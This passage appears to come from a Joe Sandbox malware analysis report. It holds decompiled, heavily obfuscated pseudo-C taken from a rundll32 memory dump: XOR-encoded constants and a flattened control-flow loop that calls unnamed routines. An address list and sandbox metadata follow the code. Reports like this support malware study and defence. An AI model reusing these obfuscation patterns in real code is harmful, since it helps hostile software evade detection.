                                                                                                                                    				_v308 = _v308 + 0x3df1;
                                                                                                                                    				_v308 = _v308 ^ 0xa2183d69;
                                                                                                                                    				_v152 = 0x5369e0;
                                                                                                                                    				_v152 = _v152 ^ 0xff6c3c62;
                                                                                                                                    				_v152 = _v152 ^ 0xff3f5582;
                                                                                                                                    				_v276 = 0x14bd80;
                                                                                                                                    				_v276 = _v276 << 5;
                                                                                                                                    				_v276 = _v276 ^ 0x5f90d5fe;
                                                                                                                                    				_v276 = _v276 / _t732;
                                                                                                                                    				_v276 = _v276 ^ 0x00de92e5;
                                                                                                                                    				_v164 = 0xc6025f;
                                                                                                                                    				_t733 = 0x77;
                                                                                                                                    				_v164 = _v164 / _t733;
                                                                                                                                    				_v164 = _v164 ^ 0x0001a9f8;
                                                                                                                                    				_v196 = 0xc87c9f;
                                                                                                                                    				_v196 = _v196 + 0x15df;
                                                                                                                                    				_v196 = _v196 ^ 0x00c8927e;
                                                                                                                                    				_v316 = 0xe66987;
                                                                                                                                    				_v316 = _v316 ^ 0x1b2582a6;
                                                                                                                                    				_t734 = 0x3b;
                                                                                                                                    				_v316 = _v316 * 0x5b;
                                                                                                                                    				_v316 = _v316 + 0x2fb1;
                                                                                                                                    				_v316 = _v316 ^ 0xdea4c46c;
                                                                                                                                    				_v224 = 0xfe0ac2;
                                                                                                                                    				_v224 = _v224 + 0xfffff1ae;
                                                                                                                                    				_v224 = _v224 ^ 0x9ea75b7a;
                                                                                                                                    				_v224 = _v224 ^ 0x9e5aa70a;
                                                                                                                                    				_v272 = 0x969b46;
                                                                                                                                    				_v272 = _v272 / _t734;
                                                                                                                                    				_t735 = 0x5e;
                                                                                                                                    				_v272 = _v272 / _t735;
                                                                                                                                    				_v272 = _v272 ^ 0xefd30b8f;
                                                                                                                                    				_v272 = _v272 ^ 0xefd30d7c;
                                                                                                                                    				_v376 = 0x150d1;
                                                                                                                                    				_v376 = _v376 + 0xf180;
                                                                                                                                    				_v376 = _v376 ^ 0x94f4a204;
                                                                                                                                    				_v376 = _v376 + 0xffff1e44;
                                                                                                                                    				_v376 = _v376 ^ 0x94f362d9;
                                                                                                                                    				_v156 = 0xee57c3;
                                                                                                                                    				_v156 = _v156 >> 1;
                                                                                                                                    				_v156 = _v156 ^ 0x00740491;
                                                                                                                                    				_v212 = 0xc602fd;
                                                                                                                                    				_v212 = _v212 + 0x6a76;
                                                                                                                                    				_v212 = _v212 + 0x1c99;
                                                                                                                                    				_v212 = _v212 ^ 0x00ce641d;
                                                                                                                                    				_v268 = 0xce4877;
                                                                                                                                    				_v268 = _v268 ^ 0x1d22fca4;
                                                                                                                                    				_v268 = _v268 | 0x3421cf88;
                                                                                                                                    				_v268 = _v268 ^ 0x3de53c3b;
                                                                                                                                    				_v124 = 0x747c03;
                                                                                                                                    				_v124 = _v124 + 0xffffbae7;
                                                                                                                                    				_v124 = _v124 ^ 0x007459dd;
                                                                                                                                    				_v236 = 0x1c09ef;
                                                                                                                                    				_t736 = 0x7d;
                                                                                                                                    				_v236 = _v236 * 0x24;
                                                                                                                                    				_v236 = _v236 >> 5;
                                                                                                                                    				_v236 = _v236 ^ 0x00154586;
                                                                                                                                    				_v248 = 0xce2f;
                                                                                                                                    				_v248 = _v248 / _t736;
                                                                                                                                    				_v248 = _v248 ^ 0x54fb24c5;
                                                                                                                                    				_v248 = _v248 ^ 0x54f69380;
                                                                                                                                    				_v368 = 0xa2f216;
                                                                                                                                    				_v368 = _v368 ^ 0x77671628;
                                                                                                                                    				_v368 = _v368 + 0xffffb776;
                                                                                                                                    				_t737 = 0x12;
                                                                                                                                    				_v368 = _v368 * 0x54;
                                                                                                                                    				_v368 = _v368 ^ 0x4cdde93a;
                                                                                                                                    				_v256 = 0x7ecaf1;
                                                                                                                                    				_v256 = _v256 + 0xffff3fac;
                                                                                                                                    				_v256 = _v256 >> 1;
                                                                                                                                    				_v256 = _v256 ^ 0x003aef01;
                                                                                                                                    				_v352 = 0xabf876;
                                                                                                                                    				_v352 = _v352 >> 0xb;
                                                                                                                                    				_v352 = _v352 + 0xffff46d6;
                                                                                                                                    				_v352 = _v352 + 0x2c0c;
                                                                                                                                    				_v352 = _v352 ^ 0xfff246b3;
                                                                                                                                    				_v360 = 0x97ba77;
                                                                                                                                    				_v360 = _v360 ^ 0x3e0377f3;
                                                                                                                                    				_v360 = _v360 >> 0xd;
                                                                                                                                    				_v360 = _v360 / _t737;
                                                                                                                                    				_v360 = _v360 ^ 0x00060934;
                                                                                                                                    				_v336 = 0x8ce7a6;
                                                                                                                                    				_t738 = 0x2f;
                                                                                                                                    				_v336 = _v336 / _t738;
                                                                                                                                    				_v336 = _v336 + 0xffff2624;
                                                                                                                                    				_v336 = _v336 | 0x278756f7;
                                                                                                                                    				_v336 = _v336 ^ 0x278bbfdd;
                                                                                                                                    				_v344 = 0xbf551b;
                                                                                                                                    				_v344 = _v344 * 0x3a;
                                                                                                                                    				_v344 = _v344 ^ 0x84c4554b;
                                                                                                                                    				_v344 = _v344 << 0xf;
                                                                                                                                    				_v344 = _v344 ^ 0x8ea60236;
                                                                                                                                    				_v200 = 0x4381fe;
                                                                                                                                    				_v200 = _v200 | 0xd1728d79;
                                                                                                                                    				_v200 = _v200 ^ 0xd172d7b5;
                                                                                                                                    				_v304 = 0x80f198;
                                                                                                                                    				_t739 = 0x31;
                                                                                                                                    				_v304 = _v304 * 0x64;
                                                                                                                                    				_v304 = _v304 << 0xe;
                                                                                                                                    				_v304 = _v304 + 0xffff9e99;
                                                                                                                                    				_v304 = _v304 ^ 0x97d19a3f;
                                                                                                                                    				_v312 = 0x373eb5;
                                                                                                                                    				_v312 = _v312 / _t739;
                                                                                                                                    				_v312 = _v312 >> 9;
                                                                                                                                    				_v312 = _v312 ^ 0x9e5751db;
                                                                                                                                    				_v312 = _v312 ^ 0x9e5d4ba0;
                                                                                                                                    				_v188 = 0xb51e1e;
                                                                                                                                    				_t740 = 0x6d;
                                                                                                                                    				_v188 = _v188 * 0x30;
                                                                                                                                    				_v188 = _v188 ^ 0x21f969de;
                                                                                                                                    				_v128 = 0x6dafe5;
                                                                                                                                    				_v128 = _v128 + 0xdb72;
                                                                                                                                    				_v128 = _v128 ^ 0x00632f59;
                                                                                                                                    				_v348 = 0xf775fc;
                                                                                                                                    				_v348 = _v348 * 0x7b;
                                                                                                                                    				_v348 = _v348 | 0xe77e6c6c;
                                                                                                                                    				_v348 = _v348 + 0xffff92b3;
                                                                                                                                    				_v348 = _v348 ^ 0xf7fd41f8;
                                                                                                                                    				_v292 = 0x49707d;
                                                                                                                                    				_v292 = _v292 + 0xffffa330;
                                                                                                                                    				_v292 = _v292 + 0x378d;
                                                                                                                                    				_v292 = _v292 ^ 0x2a616ae7;
                                                                                                                                    				_v292 = _v292 ^ 0x2a2200cf;
                                                                                                                                    				_v148 = 0xe2ca7f;
                                                                                                                                    				_v148 = _v148 + 0x2800;
                                                                                                                                    				_v148 = _v148 ^ 0x00ec4a73;
                                                                                                                                    				_v180 = 0x28ed65;
                                                                                                                                    				_t276 =  &_v180; // 0x28ed65
                                                                                                                                    				_v180 =  *_t276 / _t740;
                                                                                                                                    				_v180 = _v180 ^ 0x0008a356;
                                                                                                                                    				_v340 = 0xb04f06;
                                                                                                                                    				_v340 = _v340 | 0x19ae51aa;
                                                                                                                                    				_v340 = _v340 + 0xffff0ab2;
                                                                                                                                    				_v340 = _v340 >> 7;
                                                                                                                                    				_v340 = _v340 ^ 0x003d7bf7;
                                                                                                                                    				_v252 = 0x779412;
                                                                                                                                    				_t741 = 0x28;
                                                                                                                                    				_v252 = _v252 / _t741;
                                                                                                                                    				_v252 = _v252 | 0x065d8c29;
                                                                                                                                    				_v252 = _v252 ^ 0x0653787d;
                                                                                                                                    				_v140 = 0x2cf99d;
                                                                                                                                    				_v140 = _v140 << 0xf;
                                                                                                                                    				_v140 = _v140 ^ 0x7ccdbf9f;
                                                                                                                                    				_v300 = 0xa5c7e2;
                                                                                                                                    				_v300 = _v300 ^ 0xf64f2b87;
                                                                                                                                    				_v300 = _v300 | 0xd6032566;
                                                                                                                                    				_v300 = _v300 << 7;
                                                                                                                                    				_v300 = _v300 ^ 0x75f4cdbc;
                                                                                                                                    				_v204 = 0xc71fe4;
                                                                                                                                    				_v204 = _v204 ^ 0x39f608ad;
                                                                                                                                    				_v204 = _v204 ^ 0x39346367;
                                                                                                                                    				_v332 = 0x26340b;
                                                                                                                                    				_t742 = 0xc;
                                                                                                                                    				_v332 = _v332 / _t742;
                                                                                                                                    				_v332 = _v332 >> 0xc;
                                                                                                                                    				_v332 = _v332 + 0x4006;
                                                                                                                                    				_v332 = _v332 ^ 0x00056ca9;
                                                                                                                                    				_v244 = 0xb4bdd0;
                                                                                                                                    				_v244 = _v244 ^ 0x9dcc8204;
                                                                                                                                    				_t743 = 0x5c;
                                                                                                                                    				_v244 = _v244 * 0x56;
                                                                                                                                    				_v244 = _v244 ^ 0xe668140d;
                                                                                                                                    				_v228 = 0xb7abf;
                                                                                                                                    				_v228 = _v228 ^ 0x8d46dccd;
                                                                                                                                    				_v228 = _v228 / _t743;
                                                                                                                                    				_v228 = _v228 ^ 0x0183fb21;
                                                                                                                                    				_v132 = 0x744574;
                                                                                                                                    				_t744 = 0x2d;
                                                                                                                                    				_v132 = _v132 * 0x27;
                                                                                                                                    				_v132 = _v132 ^ 0x11b9ba9e;
                                                                                                                                    				_v384 = 0x4471dc;
                                                                                                                                    				_v384 = _v384 ^ 0x8273491f;
                                                                                                                                    				_v384 = _v384 / _t744;
                                                                                                                                    				_v384 = _v384 + 0xffffe0da;
                                                                                                                                    				_v384 = _v384 ^ 0x02e26e3a;
                                                                                                                                    				_v324 = 0x605f40;
                                                                                                                                    				_v324 = _v324 + 0xffffce94;
                                                                                                                                    				_v324 = _v324 + 0xffff95c1;
                                                                                                                                    				_v324 = _v324 >> 6;
                                                                                                                                    				_v324 = _v324 ^ 0x0001f278;
                                                                                                                                    				_v380 = 0xfa4dc1;
                                                                                                                                    				_t745 = 0x17;
                                                                                                                                    				_v380 = _v380 * 0x71;
                                                                                                                                    				_v380 = _v380 ^ 0x12ce666f;
                                                                                                                                    				_v380 = _v380 | 0xc76ff931;
                                                                                                                                    				_v380 = _v380 ^ 0xfff34e85;
                                                                                                                                    				_v172 = 0xf73d33;
                                                                                                                                    				_v172 = _v172 >> 7;
                                                                                                                                    				_v172 = _v172 ^ 0x0001a374;
                                                                                                                                    				_v364 = 0xb38f71;
                                                                                                                                    				_v364 = _v364 + 0x4143;
                                                                                                                                    				_v364 = _v364 ^ 0x53c53aac;
                                                                                                                                    				_v364 = _v364 / _t745;
                                                                                                                                    				_v364 = _v364 ^ 0x03acc109;
                                                                                                                                    				_v260 = 0xa91f99;
                                                                                                                                    				_v260 = _v260 >> 0xa;
                                                                                                                                    				_v260 = _v260 ^ 0xc9224c65;
                                                                                                                                    				_v260 = _v260 ^ 0xc926367a;
                                                                                                                                    				_v284 = 0x5ea8fe;
                                                                                                                                    				_v284 = _v284 * 0x3e;
                                                                                                                                    				_v284 = _v284 | 0x757fbe3f;
                                                                                                                                    				_v284 = _v284 ^ 0x77fedad5;
                                                                                                                                    				_v264 = 0xc1651a;
                                                                                                                                    				_v264 = _v264 / _t745;
                                                                                                                                    				_v264 = _v264 + 0x650c;
                                                                                                                                    				_v264 = _v264 ^ 0x00066731;
                                                                                                                                    				_v372 = 0xd53751;
                                                                                                                                    				_v372 = _v372 >> 0x10;
                                                                                                                                    				_v372 = _v372 * 0x50;
                                                                                                                                    				_v372 = _v372 ^ 0xc5a53504;
                                                                                                                                    				_v372 = _v372 ^ 0xc5a85656;
                                                                                                                                    				_v220 = 0x28743;
                                                                                                                                    				_v220 = _v220 | 0x747e4fe0;
                                                                                                                                    				_v220 = _v220 >> 8;
                                                                                                                                    				_v220 = _v220 ^ 0x0078aec3;
                                                                                                                                    				_v356 = 0x673303;
                                                                                                                                    				_v356 = _v356 + 0xffff3afb;
                                                                                                                                    				_v356 = _v356 >> 2;
                                                                                                                                    				_t746 = 0x76;
                                                                                                                                    				_t842 = 0x6cd454e;
                                                                                                                                    				_v96 = 0x100;
                                                                                                                                    				_t840 = 0xcf5796f;
                                                                                                                                    				_v356 = _v356 * 9;
                                                                                                                                    				_v356 = _v356 ^ 0x00e12344;
                                                                                                                                    				_v232 = 0xe5489f;
                                                                                                                                    				_v232 = _v232 * 0x62;
                                                                                                                                    				_v232 = _v232 ^ 0x422e6763;
                                                                                                                                    				_v232 = _v232 ^ 0x15e3beef;
                                                                                                                                    				_v144 = 0x9d1c0d;
                                                                                                                                    				_v144 = _v144 | 0x5a9db401;
                                                                                                                                    				_v144 = _v144 ^ 0x5a9ceaa6;
                                                                                                                                    				_v328 = 0xaba5b0;
                                                                                                                                    				_v328 = _v328 + 0xfc55;
                                                                                                                                    				_v328 = _v328 * 0x37;
                                                                                                                                    				_v328 = _v328 * 0x78;
                                                                                                                                    				_v328 = _v328 ^ 0x62b938e2;
                                                                                                                                    				_v168 = 0x51360e;
                                                                                                                                    				_v168 = _v168 << 2;
                                                                                                                                    				_v168 = _v168 ^ 0x014a45e2;
                                                                                                                                    				_v176 = 0x11fbeb;
                                                                                                                                    				_v176 = _v176 << 0xa;
                                                                                                                                    				_v176 = _v176 ^ 0x47e89d0f;
                                                                                                                                    				_v216 = 0x8fcc87;
                                                                                                                                    				_v216 = _v216 / _t746;
                                                                                                                                    				_v216 = _v216 ^ 0xd2cd5e41;
                                                                                                                                    				_v216 = _v216 ^ 0xd2c9cc36;
                                                                                                                                    				_v184 = 0x8a666a;
                                                                                                                                    				_v184 = _v184 * 0x6c;
                                                                                                                                    				_v184 = _v184 ^ 0x3a66624b;
                                                                                                                                    				_v288 = 0x12fc4d;
                                                                                                                                    				_v288 = _v288 ^ 0x84b68421;
                                                                                                                                    				_v288 = _v288 * 0x77;
                                                                                                                                    				_v288 = _v288 ^ 0xa87aad10;
                                                                                                                                    				_v296 = 0xb3f337;
                                                                                                                                    				_v296 = _v296 >> 1;
                                                                                                                                    				_v296 = _v296 + 0xffffa2d0;
                                                                                                                                    				_v296 = _v296 + 0xffff98aa;
                                                                                                                                    				_v296 = _v296 ^ 0x0050e375;
                                                                                                                                    				_v160 = 0xa98b94;
                                                                                                                                    				_v160 = _v160 ^ 0x93f8baf3;
                                                                                                                                    				_v160 = _v160 ^ 0x935506dc;
                                                                                                                                    				_v208 = 0xd26eef;
                                                                                                                                    				_v208 = _v208 + 0xffff657d;
                                                                                                                                    				_v208 = _v208 << 5;
                                                                                                                                    				_v208 = _v208 ^ 0x1a3ecca6;
                                                                                                                                    				_v280 = 0xce1cc4;
                                                                                                                                    				_v280 = _v280 << 6;
                                                                                                                                    				_v280 = _v280 << 0x10;
                                                                                                                                    				_v280 = _v280 | 0xb3a7eb9b;
                                                                                                                                    				_v280 = _v280 ^ 0xb3a418cd;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t747 = 0xb34e23f;
                                                                                                                                    					while(1) {
                                                                                                                                    						L2:
                                                                                                                                    						while(1) {
                                                                                                                                    							L3:
                                                                                                                                    							_t690 = 0xa0b11f8;
                                                                                                                                    							do {
                                                                                                                                    								while(1) {
                                                                                                                                    									L4:
                                                                                                                                    									_t850 = _t725 - _t690;
                                                                                                                                    									if(_t850 > 0) {
                                                                                                                                    										break;
                                                                                                                                    									}
                                                                                                                                    									if(_t850 == 0) {
                                                                                                                                    										_t700 = E002D4624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
                                                                                                                                    										_t847 = _t847 + 0x14;
                                                                                                                                    										__eflags = _t700;
                                                                                                                                    										_t747 = 0xb34e23f;
                                                                                                                                    										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
                                                                                                                                    										goto L2;
                                                                                                                                    									} else {
                                                                                                                                    										if(_t725 == 0x24fa5ba) {
                                                                                                                                    											_push(_v212);
                                                                                                                                    											_push(_v156);
                                                                                                                                    											_t701 = E002DDCF7(_v376, 0x2c1984, __eflags);
                                                                                                                                    											_push(_v236);
                                                                                                                                    											_push(_v124);
                                                                                                                                    											_t704 = E002C9462(_t701, _v368,  &_v116, E002DDCF7(_v268, 0x2c1814, __eflags), _v256, _v136);
                                                                                                                                    											_t847 = _t847 + 0x24;
                                                                                                                                    											__eflags = _t704 - _v240;
                                                                                                                                    											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
                                                                                                                                    											E002CA8B0(_v352, _t701, _v360);
                                                                                                                                    											E002CA8B0(_v336, _t702, _v344);
                                                                                                                                    											_t840 = 0xcf5796f;
                                                                                                                                    											goto L13;
                                                                                                                                    										} else {
                                                                                                                                    											if(_t725 == 0x505fe8e) {
                                                                                                                                    												_t631 =  &_v208; // 0x39346367
                                                                                                                                    												E002C957D(_v116, _v160,  *_t631, _v272, _v280);
                                                                                                                                    											} else {
                                                                                                                                    												if(_t725 == _t842) {
                                                                                                                                    													_push(_v340);
                                                                                                                                    													_push(_v180);
                                                                                                                                    													_t710 = E002DDCF7(_v148, 0x2c1854, __eflags);
                                                                                                                                    													_pop(_t763);
                                                                                                                                    													_t844 = _t710;
                                                                                                                                    													_t711 = 0x48;
                                                                                                                                    													_v104 = _t711;
                                                                                                                                    													_t713 = E002C1C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
                                                                                                                                    													_t847 = _t847 + 0x28;
                                                                                                                                    													__eflags = _t713 - _v164;
                                                                                                                                    													if(_t713 != _v164) {
                                                                                                                                    														_t725 = _t840;
                                                                                                                                    													} else {
                                                                                                                                    														_t834 =  *0x2e3dfc; // 0x0
                                                                                                                                    														E002CED7E(_v244, _t834, _v228,  &_v68, 0x40);
                                                                                                                                    														_t847 = _t847 + 0xc;
                                                                                                                                    														_t725 = 0x9bcfe4f;
                                                                                                                                    													}
                                                                                                                                    													E002CA8B0(_v132, _t844, _v384);
                                                                                                                                    													goto L13;
                                                                                                                                    												} else {
                                                                                                                                    													if(_t725 == 0x7252bf3) {
                                                                                                                                    														_t725 = 0x24fa5ba;
                                                                                                                                    														continue;
                                                                                                                                    													} else {
                                                                                                                                    														if(_t725 == _t819) {
                                                                                                                                    															_t717 = E002CB144(_v120, _v188, _v308, _v128, _v348, _v292);
                                                                                                                                    															_t847 = _t847 + 0x10;
                                                                                                                                    															__eflags = _t717 - _v152;
                                                                                                                                    															_t725 =  ==  ? _t842 : _t840;
                                                                                                                                    															while(1) {
                                                                                                                                    																L1:
                                                                                                                                    																_t747 = 0xb34e23f;
                                                                                                                                    																L2:
                                                                                                                                    																L3:
                                                                                                                                    																_t690 = 0xa0b11f8;
                                                                                                                                    																goto L4;
                                                                                                                                    															}
                                                                                                                                    														} else {
                                                                                                                                    															_t856 = _t725 - 0x9bcfe4f;
                                                                                                                                    															if(_t725 == 0x9bcfe4f) {
                                                                                                                                    																_push(_v172);
                                                                                                                                    																_push(_v380);
                                                                                                                                    																_t719 = E002DDCF7(_v324, 0x2c1854, _t856);
                                                                                                                                    																_pop(_t772);
                                                                                                                                    																E002CAA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                                    																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                                    																E002CA8B0(_v220, _t719, _v356);
                                                                                                                                    																_t847 = _t847 + 0x2c;
                                                                                                                                    																L13:
                                                                                                                                    																_t842 = 0x6cd454e;
                                                                                                                                    																L32:
                                                                                                                                    																_t819 = 0x9b01f0f;
                                                                                                                                    																_t747 = 0xb34e23f;
                                                                                                                                    																_t690 = 0xa0b11f8;
                                                                                                                                    															}
                                                                                                                                    															goto L33;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    									L36:
                                                                                                                                    									return _t846;
                                                                                                                                    								}
                                                                                                                                    								__eflags = _t725 - _t747;
                                                                                                                                    								if(_t725 == _t747) {
                                                                                                                                    									_t691 = E002C2BD9(_v112);
                                                                                                                                    									_t725 = 0xb500bcf;
                                                                                                                                    									__eflags = _t691;
                                                                                                                                    									_t846 =  !=  ? 1 : _t846;
                                                                                                                                    									goto L32;
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t725 - 0xb500bcf;
                                                                                                                                    									if(_t725 == 0xb500bcf) {
                                                                                                                                    										E002DCA69(_v112, _v168, _v176);
                                                                                                                                    										_t725 = 0xcc5fcc9;
                                                                                                                                    										goto L1;
                                                                                                                                    									} else {
                                                                                                                                    										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                                    										if(_t725 == 0xcc5fcc9) {
                                                                                                                                    											E002CA958(_v216, _v108, _v184);
                                                                                                                                    											_t725 = _t840;
                                                                                                                                    											while(1) {
                                                                                                                                    												L1:
                                                                                                                                    												_t747 = 0xb34e23f;
                                                                                                                                    												goto L2;
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											__eflags = _t725 - _t840;
                                                                                                                                    											if(_t725 == _t840) {
                                                                                                                                    												E002CA958(_v288, _v120, _v296);
                                                                                                                                    												_t725 = 0x505fe8e;
                                                                                                                                    												while(1) {
                                                                                                                                    													L1:
                                                                                                                                    													_t747 = 0xb34e23f;
                                                                                                                                    													goto L2;
                                                                                                                                    												}
                                                                                                                                    											} else {
                                                                                                                                    												__eflags = _t725 - 0xec78b05;
                                                                                                                                    												if(__eflags != 0) {
                                                                                                                                    													goto L33;
                                                                                                                                    												} else {
                                                                                                                                    													_v104 = _v96;
                                                                                                                                    													_t697 = E002C92C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                                    													_t847 = _t847 + 0x14;
                                                                                                                                    													__eflags = _t697 - _v192;
                                                                                                                                    													_t819 = 0x9b01f0f;
                                                                                                                                    													_t747 = 0xb34e23f;
                                                                                                                                    													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                                    													goto L3;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    								goto L36;
                                                                                                                                    								L33:
                                                                                                                                    							} while (_t725 != 0xc75135f);
                                                                                                                                    							goto L36;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    			}
                                                                                                                                    0x002cbea4
                                                                                                                                    0x002cbeaf
                                                                                                                                    0x002cbec5
                                                                                                                                    0x002cbecc
                                                                                                                                    0x002cbed7
                                                                                                                                    0x002cbee2
                                                                                                                                    0x002cbeea
                                                                                                                                    0x002cbef2
                                                                                                                                    0x002cbeff
                                                                                                                                    0x002cbf02
                                                                                                                                    0x002cbf06
                                                                                                                                    0x002cbf0e
                                                                                                                                    0x002cbf19
                                                                                                                                    0x002cbf24
                                                                                                                                    0x002cbf2b
                                                                                                                                    0x002cbf36
                                                                                                                                    0x002cbf3e
                                                                                                                                    0x002cbf43
                                                                                                                                    0x002cbf4b
                                                                                                                                    0x002cbf53
                                                                                                                                    0x002cbf5b
                                                                                                                                    0x002cbf63
                                                                                                                                    0x002cbf6b
                                                                                                                                    0x002cbf78
                                                                                                                                    0x002cbf7c
                                                                                                                                    0x002cbf84
                                                                                                                                    0x002cbf90
                                                                                                                                    0x002cbf93
                                                                                                                                    0x002cbf97
                                                                                                                                    0x002cbf9f
                                                                                                                                    0x002cbfa7
                                                                                                                                    0x002cbfaf
                                                                                                                                    0x002cbfbc
                                                                                                                                    0x002cbfc0
                                                                                                                                    0x002cbfc8
                                                                                                                                    0x002cbfcd
                                                                                                                                    0x002cbfd5
                                                                                                                                    0x002cbfe0
                                                                                                                                    0x002cbfeb
                                                                                                                                    0x002cbff8
                                                                                                                                    0x002cc007
                                                                                                                                    0x002cc00a
                                                                                                                                    0x002cc00e
                                                                                                                                    0x002cc013
                                                                                                                                    0x002cc01b
                                                                                                                                    0x002cc023
                                                                                                                                    0x002cc033
                                                                                                                                    0x002cc037
                                                                                                                                    0x002cc03c
                                                                                                                                    0x002cc044
                                                                                                                                    0x002cc04c
                                                                                                                                    0x002cc05f
                                                                                                                                    0x002cc062
                                                                                                                                    0x002cc069
                                                                                                                                    0x002cc074
                                                                                                                                    0x002cc07f
                                                                                                                                    0x002cc08a
                                                                                                                                    0x002cc095
                                                                                                                                    0x002cc0a2
                                                                                                                                    0x002cc0a6
                                                                                                                                    0x002cc0ae
                                                                                                                                    0x002cc0b6
                                                                                                                                    0x002cc0be
                                                                                                                                    0x002cc0c6
                                                                                                                                    0x002cc0ce
                                                                                                                                    0x002cc0d6
                                                                                                                                    0x002cc0de
                                                                                                                                    0x002cc0e6
                                                                                                                                    0x002cc0f1
                                                                                                                                    0x002cc0fc
                                                                                                                                    0x002cc107
                                                                                                                                    0x002cc112
                                                                                                                                    0x002cc11d
                                                                                                                                    0x002cc124
                                                                                                                                    0x002cc12f
                                                                                                                                    0x002cc137
                                                                                                                                    0x002cc13f
                                                                                                                                    0x002cc147
                                                                                                                                    0x002cc14c
                                                                                                                                    0x002cc154
                                                                                                                                    0x002cc166
                                                                                                                                    0x002cc16b
                                                                                                                                    0x002cc174
                                                                                                                                    0x002cc17f
                                                                                                                                    0x002cc18a
                                                                                                                                    0x002cc195
                                                                                                                                    0x002cc19d
                                                                                                                                    0x002cc1a8
                                                                                                                                    0x002cc1b0
                                                                                                                                    0x002cc1b8
                                                                                                                                    0x002cc1c0
                                                                                                                                    0x002cc1c5
                                                                                                                                    0x002cc1cd
                                                                                                                                    0x002cc1d8
                                                                                                                                    0x002cc1e3
                                                                                                                                    0x002cc1ee
                                                                                                                                    0x002cc1fa
                                                                                                                                    0x002cc1fd
                                                                                                                                    0x002cc201
                                                                                                                                    0x002cc206
                                                                                                                                    0x002cc20e
                                                                                                                                    0x002cc216
                                                                                                                                    0x002cc223
                                                                                                                                    0x002cc238
                                                                                                                                    0x002cc23b
                                                                                                                                    0x002cc242
                                                                                                                                    0x002cc24d
                                                                                                                                    0x002cc258
                                                                                                                                    0x002cc26e
                                                                                                                                    0x002cc275
                                                                                                                                    0x002cc280
                                                                                                                                    0x002cc293
                                                                                                                                    0x002cc296
                                                                                                                                    0x002cc29d
                                                                                                                                    0x002cc2a8
                                                                                                                                    0x002cc2b0
                                                                                                                                    0x002cc2c0
                                                                                                                                    0x002cc2c4
                                                                                                                                    0x002cc2cc
                                                                                                                                    0x002cc2d4
                                                                                                                                    0x002cc2dc
                                                                                                                                    0x002cc2e4
                                                                                                                                    0x002cc2ec
                                                                                                                                    0x002cc2f1
                                                                                                                                    0x002cc2f9
                                                                                                                                    0x002cc306
                                                                                                                                    0x002cc307
                                                                                                                                    0x002cc30b
                                                                                                                                    0x002cc313
                                                                                                                                    0x002cc31b
                                                                                                                                    0x002cc323
                                                                                                                                    0x002cc32e
                                                                                                                                    0x002cc336
                                                                                                                                    0x002cc341
                                                                                                                                    0x002cc349
                                                                                                                                    0x002cc351
                                                                                                                                    0x002cc361
                                                                                                                                    0x002cc365
                                                                                                                                    0x002cc36d
                                                                                                                                    0x002cc378
                                                                                                                                    0x002cc380
                                                                                                                                    0x002cc38b
                                                                                                                                    0x002cc396
                                                                                                                                    0x002cc3a3
                                                                                                                                    0x002cc3a7
                                                                                                                                    0x002cc3af
                                                                                                                                    0x002cc3b7
                                                                                                                                    0x002cc3cb
                                                                                                                                    0x002cc3d2
                                                                                                                                    0x002cc3dd
                                                                                                                                    0x002cc3e8
                                                                                                                                    0x002cc3f0
                                                                                                                                    0x002cc3fa
                                                                                                                                    0x002cc3fe
                                                                                                                                    0x002cc406
                                                                                                                                    0x002cc40e
                                                                                                                                    0x002cc419
                                                                                                                                    0x002cc424
                                                                                                                                    0x002cc42c
                                                                                                                                    0x002cc437
                                                                                                                                    0x002cc43f
                                                                                                                                    0x002cc447
                                                                                                                                    0x002cc455
                                                                                                                                    0x002cc456
                                                                                                                                    0x002cc45b
                                                                                                                                    0x002cc466
                                                                                                                                    0x002cc46b
                                                                                                                                    0x002cc46f
                                                                                                                                    0x002cc477
                                                                                                                                    0x002cc48a
                                                                                                                                    0x002cc491
                                                                                                                                    0x002cc49c
                                                                                                                                    0x002cc4a7
                                                                                                                                    0x002cc4b2
                                                                                                                                    0x002cc4bd
                                                                                                                                    0x002cc4c8
                                                                                                                                    0x002cc4d0
                                                                                                                                    0x002cc4dd
                                                                                                                                    0x002cc4e6
                                                                                                                                    0x002cc4ea
                                                                                                                                    0x002cc4f2
                                                                                                                                    0x002cc4fd
                                                                                                                                    0x002cc505
                                                                                                                                    0x002cc510
                                                                                                                                    0x002cc51b
                                                                                                                                    0x002cc523
                                                                                                                                    0x002cc52e
                                                                                                                                    0x002cc542
                                                                                                                                    0x002cc549
                                                                                                                                    0x002cc554
                                                                                                                                    0x002cc55f
                                                                                                                                    0x002cc572
                                                                                                                                    0x002cc579
                                                                                                                                    0x002cc584
                                                                                                                                    0x002cc594
                                                                                                                                    0x002cc5a1

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
